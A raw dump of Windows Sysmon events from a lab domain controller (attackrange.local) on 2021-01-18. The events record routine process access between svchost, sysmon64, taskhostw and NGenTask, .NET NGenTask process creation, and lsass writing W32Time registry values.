13:44:00.596{59A5CD1D-90A0-6005-2301-00000000A301}36844120C:\Windows\system32\taskhostw.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|UNKNOWN(00007FF8288911E2) 154100x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.608{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:396C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000{59A5CD1D-90A0-6005-2301-00000000A301}3684C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.581{59A5CD1D-90A0-6005-2301-00000000A301}36844220C:\Windows\system32\taskhostw.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|UNKNOWN(00007FF8288911E2) 154100x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.584{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:880C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{59A5CD1D-90A0-6005-2301-00000000A301}3684C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 13241300x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00094e33) 13241300x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed97-0x97e34de5) 13241300x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ed9f-0xf9a7b5e5) 13241300x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda8-0x5b6c1de5) 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 